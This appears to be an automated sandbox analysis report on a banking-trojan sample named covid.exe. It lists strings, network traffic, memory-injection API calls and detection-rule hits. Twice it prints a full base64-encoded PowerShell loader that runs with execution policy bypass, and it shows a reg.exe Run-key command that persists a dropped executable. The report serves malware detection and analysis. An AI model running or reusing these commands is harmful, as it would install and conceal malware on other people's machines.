    Source: base[1].js.7.drString found in binary or memory: https://docs.google.com/get_video_info
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: base[1].js.7.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/osd.js
    Source: FL794448.htm.7.drString found in binary or memory: https://platform.twitter.com/widgets.js
    Source: base[1].js.7.drString found in binary or memory: https://redux.js.org/api/store#subscribelistener
    Source: FL794448.htm.7.drString found in binary or memory: https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5803f964fe6c9599
    Source: FL794448.htm.7.drString found in binary or memory: https://schema.org
    Source: analytics[1].js.7.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=missing_quality
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=noaudio
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=report_playback
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/answer/6276924
    Source: analytics[1].js.7.drString found in binary or memory: https://tagassistant.google.com/
    Source: base[1].js.7.drString found in binary or memory: https://viacon.corp.google.com
    Source: FL794448.htm.7.drString found in binary or memory: https://www.afro.who.int/
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google.%/ads/ga-audiences
    Source: base[1].js.7.drString found in binary or memory: https://www.googleapis.com/certificateprovisioning/v1/devicecertificates/create?key=AIzaSyB-5OLKTx2i
    Source: analytics[1].js.7.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-5QFSQRT
    Source: FL794448.htm.7.drString found in binary or memory: https://www.paho.org/hq/index.php?lang=en
    Source: powershell.exe, 00000001.00000003.262923135.000001A42AFB3000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp, FL794448.htm.7.drString found in binary or memory: https://www.who.int
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
    Source: powershell.exe, 00000001.00000002.293621546.000001A42B1B0000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/T
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/governance/world-health-assembly/seventy-third-world-health-assembly
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/what-we-do/who-brochure
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/who-we-are/privacy-policy
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ar/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/campaigns/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/campaigns/connecting-the-world-to-combat-coronavirus/how-to-report-misinformatio
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/crises/cod/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timeline
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/es/home
    Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/f
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/fr/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/home/search?indexCatalogue=genericsearchindex1&wordsMode=AnyWord&searchQuery=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ictrp/search/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/images/default-source/infographics/logo-who.tmb-1200v.jpg?Culture=en&amp;sfvrsn=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/news-room/events
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/news-room/releases
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/news/item#:ItemDefaultUrl
    Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/nt/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/pt/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/publications/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/mega-menu/data/announcement/world-health-statistics-2020
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/emergencies/democratic-republic-of-the-cong
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboard
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/page/novel-coronavirus-(covid-19)-situation-dashboard
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ru/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/southeastasia
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/westernpacific/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/zh/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.youtube.com/embed/yEIPefMsf70
    Source: base[1].js.7.drString found in binary or memory: https://www.youtube.com/generate_204?cpn=
    Source: base[1].js.7.drString found in binary or memory: https://youtu.be/
    Source: base[1].js.7.drString found in binary or memory: https://youtube.com/api/drm/fps?ek=uninitialized
    Source: base[1].js.7.drString found in binary or memory: https://youtubei.googleapis.com/youtubei/
    Source: base[1].js.7.drString found in binary or memory: https://yurt.corp.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2

    E-Banking Fraud:

    barindex
    Malicious encrypted Powershell command line foundShow sources
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior

    System Summary:

    barindex
    Powershell drops PE fileShow sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\buyonegetone.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68604761C NtQueueApcThread,13_2_00007FF68604761C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860473EC NtResumeThread,13_2_00007FF6860473EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047494 NtAllocateVirtualMemory,13_2_00007FF686047494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047478 NtWriteVirtualMemory,13_2_00007FF686047478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE10761C NtQueueApcThread,18_2_00007FF6FE10761C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1073EC NtResumeThread,18_2_00007FF6FE1073EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107494 NtAllocateVirtualMemory,18_2_00007FF6FE107494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107478 NtWriteVirtualMemory,18_2_00007FF6FE107478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67478 NtWriteVirtualMemory,29_2_00007FF7E3D67478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67494 NtAllocateVirtualMemory,29_2_00007FF7E3D67494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D673EC NtResumeThread,29_2_00007FF7E3D673EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D6761C NtQueueApcThread,29_2_00007FF7E3D6761C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEB110AB1_2_00007FFAEEB110AB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEB10FC21_2_00007FFAEEB10FC2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEBE28D11_2_00007FFAEEBE28D1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEBE6DE81_2_00007FFAEEBE6DE8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605CFAC13_2_00007FF68605CFAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605701913_2_00007FF686057019
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605110C13_2_00007FF68605110C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605293413_2_00007FF686052934
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860665A813_2_00007FF6860665A8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860415B013_2_00007FF6860415B0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860655F413_2_00007FF6860655F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605FE0813_2_00007FF68605FE08
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860536B413_2_00007FF6860536B4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686055ED813_2_00007FF686055ED8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605C71C13_2_00007FF68605C71C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686062B4C13_2_00007FF686062B4C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605BC0013_2_00007FF68605BC00
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686043C2013_2_00007FF686043C20
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860614EC13_2_00007FF6860614EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68604114013_2_00007FF686041140
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605D1B813_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605B1F413_2_00007FF68605B1F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605628413_2_00007FF686056284
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686056AA013_2_00007FF686056AA0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE115ED818_2_00007FF6FE115ED8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11CFAC18_2_00007FF6FE11CFAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11701918_2_00007FF6FE117019
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11293418_2_00007FF6FE112934
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11110C18_2_00007FF6FE11110C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1265A818_2_00007FF6FE1265A8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1015B018_2_00007FF6FE1015B0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1255F418_2_00007FF6FE1255F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11FE0818_2_00007FF6FE11FE08
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1136B418_2_00007FF6FE1136B4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11C71C18_2_00007FF6FE11C71C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE122B4C18_2_00007FF6FE122B4C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11BC0018_2_00007FF6FE11BC00
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE103C2018_2_00007FF6FE103C20
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1214EC18_2_00007FF6FE1214EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE10114018_2_00007FF6FE101140
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11B1F418_2_00007FF6FE11B1F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11D1B818_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE116AA018_2_00007FF6FE116AA0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11628418_2_00007FF6FE116284
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D75ED829_2_00007FF7E3D75ED8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D814EC29_2_00007FF7E3D814EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D63C2029_2_00007FF7E3D63C20
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7BC0029_2_00007FF7E3D7BC00
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D82B4C29_2_00007FF7E3D82B4C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D76AA029_2_00007FF7E3D76AA0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7628429_2_00007FF7E3D76284
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7B1F429_2_00007FF7E3D7B1F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7D1B829_2_00007FF7E3D7D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D6114029_2_00007FF7E3D61140
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7293429_2_00007FF7E3D72934
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7110C29_2_00007FF7E3D7110C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7701929_2_00007FF7E3D77019
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7CFAC29_2_00007FF7E3D7CFAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7C71C29_2_00007FF7E3D7C71C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D736B429_2_00007FF7E3D736B4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7FE0829_2_00007FF7E3D7FE08
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D855F429_2_00007FF7E3D855F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D865A829_2_00007FF7E3D865A8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D615B029_2_00007FF7E3D615B0
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
    Source: covid.exeStatic PE information: invalid certificate
    Source: covid.exeBinary or memory string: OriginalFilename vs covid.exe
    Source: covid.exe, 00000000.00000002.302616410.0000000000C72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmpBinary or memory string: originalfilename vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs covid.exe
    Source: covid.exe, 00000000.00000002.304256413.00000000031A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs covid.exe
    Source: covid.exe, 00000000.00000002.303581212.000000000156A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs covid.exe
    Source: covid.exeBinary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@32/132@14/13
    Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.logJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:244:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6224
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5504
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1Jump to behavior
    Source: covid.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\covid.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\covid.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: covid.exeVirustotal: Detection: 15%
    Source: covid.exeReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
